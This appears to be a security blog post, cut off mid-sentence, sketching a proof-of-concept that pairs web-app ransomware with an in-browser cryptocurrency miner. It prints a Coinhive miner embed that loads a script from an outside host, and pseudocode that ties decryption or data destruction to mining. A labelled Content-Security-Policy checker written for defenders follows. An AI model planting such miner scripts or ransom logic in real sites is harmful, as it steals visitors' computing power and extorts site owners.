A few months back in a previous post we gave a POC for malware embedded in an enterprise Spring MVC app. Then we got to thinking, what if we pwn3d a web app with malicious code and turned the result into a self-paying crypto-currency miner? You could give the owner of the site the option to either pay the ransom or just let the mining operation complete, at which point their files get decrypted, and their life goes back to normal.
Our crypto miner web app extends the previous concept. So, let's first review:
This concept takes the previous iteration and adds a miner to the operation so we can make some crypto-cash while we wait for the ransom to be delivered.
This way the miner starts as soon as the ransomware note page is loaded.
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');
  miner.start();
</script>
while(miner.getHashesPerSecond() > 0)
  // show ransom note to allow decryption
// else destroy data
We can also make things more interesting by letting the user either pay the ransom and unlock the data immediately, or allow the crypto miner to run until the amount required by the ransomware is mined, then decrypt the data.
while (miner.getAcceptedHashes() < SOME_VAL)
  // keep mining
// else decrypt data since we already made our money
It seems like a new ransomware called Storagecrypt may already be doing a variation of this attack. Of course, site owners with good security, especially those with good Content Security Policies, can avoid this kind of attack by:
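A defender-side check, added here as an example and not part of the original post: the simplified evaluator below tests whether a Content-Security-Policy header would block the two script elements shown above (the external coinhive.com library and the inline starter script). The two policies, the page origin `https://shop.example` and all function names are constructed for illustration.

```javascript
// Added example: simplified CSP source-list matching. Handles script-src with
// default-src fallback, keywords, scheme and host sources; ignores paths,
// ports, 'strict-dynamic' and scheme matching for scheme-less host sources.
const MINER_URL = 'https://coinhive.com/lib/coinhive.min.js'; // URL from the post
const PAGE_ORIGIN = 'https://shop.example';                   // assumed site origin
const WEAK_POLICY = "script-src 'self' 'unsafe-inline' https:";              // constructed
const STRICT_POLICY = "default-src 'self'; script-src 'self' 'nonce-r4nd0m'"; // constructed

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !policy.has(key)) policy.set(key, sources); // first directive wins
  }
  return policy;
}

// Source list governing <script>, or null when the policy does not restrict scripts.
function scriptSources(policy) {
  return policy.get('script-src') ?? policy.get('default-src') ?? null;
}

function allowsInlineScript(policy) {
  const src = scriptSources(policy);
  if (src === null) return true;
  const lower = src.map(s => s.toLowerCase());
  // Browsers ignore 'unsafe-inline' once a nonce or hash source is present.
  const hasNonceOrHash = lower.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return lower.includes("'unsafe-inline'") && !hasNonceOrHash;
}

function allowsExternalScript(policy, scriptUrl, pageOrigin) {
  const src = scriptSources(policy);
  if (src === null) return true;
  const url = new URL(scriptUrl);
  return src.some(raw => {
    const s = raw.toLowerCase();
    if (s === "'self'") return url.origin === pageOrigin;
    if (s.startsWith("'")) return false;             // 'none', nonces, hashes
    if (s === '*') return /^https?:$/.test(url.protocol);
    if (s.endsWith(':')) return url.protocol === s;  // scheme source such as https:
    const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/);
    if (!m || (m[1] && m[1] + ':' !== url.protocol)) return false;
    const host = m[2];
    return host.startsWith('*.') ? url.hostname.endsWith(host.slice(1)) : url.hostname === host;
  });
}
```

Under the first constructed policy both script elements load, because `https:` admits any HTTPS origin and `'unsafe-inline'` admits the inline block; under the second, neither does, while same-origin scripts still run.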